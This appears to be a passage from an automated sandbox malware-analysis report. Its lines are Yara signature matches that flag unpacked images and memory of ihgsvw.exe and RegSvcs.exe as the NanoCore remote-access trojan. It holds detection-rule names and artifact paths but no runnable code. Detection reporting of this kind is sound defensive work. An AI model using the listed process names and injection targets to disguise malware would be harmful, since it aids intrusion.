      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR

      Operating System Destruction

      barindex
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00

      System Summary

      barindex
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
